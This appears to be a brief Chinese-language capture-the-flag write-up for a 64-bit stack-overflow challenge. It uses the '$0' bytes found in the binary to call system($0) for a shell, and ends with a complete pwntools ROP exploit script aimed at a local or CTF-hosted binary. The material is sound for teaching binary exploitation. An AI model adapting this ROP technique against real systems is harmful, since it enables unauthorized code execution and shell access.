文件保护
ida加载
分析过程
通过栈溢出
利用system($0)获得shell权限
$0在机器码中为 \x24\x30
正好tips函数中有我们需要的机器码
总而言之我们现在要构造的payload就是首先需要覆盖返回地址,然后使用ret弹出一个地址,再使用pop rdi ret 把我们的shell的地址存进rdi寄存器里,最后再调用system函数,因为rdi里存着shell函数的地址所以调用了system函数就等于system($0),因为rdi是64位传参中最先传输的。
exp
from pwn import *
#p = remote(node4.anna.nssctf.cn',28148)
p = process('./shell')
system_add = 0x0400430
ret_add = 0x0400416
pop_rdi_add = 0x04005e3
bin_sh_add = 0x0400541
payload = b'a' * (0x10+8) + p64(ret_add) + p64(pop_rdi_add) + p64(bin_sh_add) + p64(system_add)
p.sendline(payload)
p.interactive()